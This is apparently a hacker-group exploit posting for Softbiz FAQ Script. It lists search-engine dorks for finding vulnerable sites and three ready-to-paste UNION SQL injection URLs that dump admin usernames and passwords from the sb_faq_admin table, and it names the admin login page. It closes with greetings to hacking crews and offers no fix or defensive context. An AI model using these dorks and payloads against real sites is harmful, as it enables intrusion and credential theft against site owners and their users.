Softbiz FAQ Script suffers from multiple SQL injection vulnerabilities.
a0d3cb3f91b8d3dc4694767f992e8c5380bbe886e5553f68dd10a09daddc5818
|___________________________________________________|
|
| Softbiz FAQ Script Multiple SQL Injection Vulnerability
|
|___________________________________________________
|--------------------IQ-Security--------------------|
|
| Author: Hussin X
|
| Home : WwW.IQ-TY.CoM | wWw.TrYaG.cC
|
| email: darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
| |
|
| script : http://www.softbizscripts.com
|
| DorK : inurl:"faq_qanda.php?id="
| DorK : inurl:"index.php?cid="
| DorK : inurl: "print_article.php?id="
|___________________________________________________|
Exploit:
________
www.[target].com/Script/faq_qanda.php?id=-1+union+select+null,null,concat_ws(0x3a,adminname,adminpwd),null,null,null,null,null,null,null,null,null+from+sb_faq_admin--
2
www.[target].com/Script/index.php?cid=-1+union+select+null,concat_ws(0x3a,adminname,adminpwd),null,null+from+sb_faq_admin--
3
www.[target].com/Script/print_article.php?id=-1+union+select+null,null,concat_ws(0x3a,adminname,adminpwd),null,null,null,null,null,null,null,null,null+from+sb_faq_admin--
Login :
www.[target].com/Script/admin/
____________________________( Greetz )_________________________________
|
| IQ-Security > WwW.IQ-TY.CoM | wWw.TrYaG.cC
|
| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone
|______________________________________________________________________
Im IRAQi